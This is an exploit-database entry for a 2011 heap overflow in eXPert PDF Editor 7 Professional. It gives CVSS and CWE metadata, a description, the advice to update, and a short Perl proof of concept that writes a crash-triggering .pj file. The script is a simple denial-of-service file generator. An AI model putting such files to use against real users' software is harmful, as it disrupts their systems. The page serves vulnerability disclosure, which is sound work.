eXPert PDF Editor 7 Professional Heap Overflow

vendor:

eXPert PDF Editor 7 Professional

by:

KedAns-Dz

7.8

CVSS

HIGH

Heap-based buffer-overflow

119

CWE

Product Name: eXPert PDF Editor 7 Professional

Affected Version From: 7

Affected Version To: 7

Patch Exists: Yes

Related CWE: N/A

CPE: a:visagesoft:expert_pdf_editor_professional:7.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

eXPert PDF Editor 7 Professional Heap Overflow

eXPert PDF is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds check user-supplied data before copying it into an insufficiently sized buffer. An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Update to the latest version of eXPert PDF Editor 7 Professional

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47571/info

eXPert PDF is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds check user-supplied data before copying it into an insufficiently sized buffer.

An attacker could exploit this issue to execute arbitrary code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. 

#!/usr/bin/perl
sub logo {
print STDERR << "EOF";
		                                                               
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

EOF
}
# ---------
# eXPert PDF Editor 7 Professional Heap Proof Of Concept Exploit
# Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com>
# special thanks to : Inj3ct0r Team + exploit-id Team
# ---------
# Target : eXPert PDF Editor v7.0.880.0
# Tested in Windows XP sp3 France
# Creating The Bad File .PJ And => Bo0M !
# Heap 0x0174EC24 in 'vspdfeditor140.bpl' . addres 00000008
my $PoC = "\x4b\x45\x44\x41\x4e\x53"; # NULL Heap PoC
open (FILE,">> KedAns.pj"); # Bad File Here
print FILE $PoC;
close (FILE);
# KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans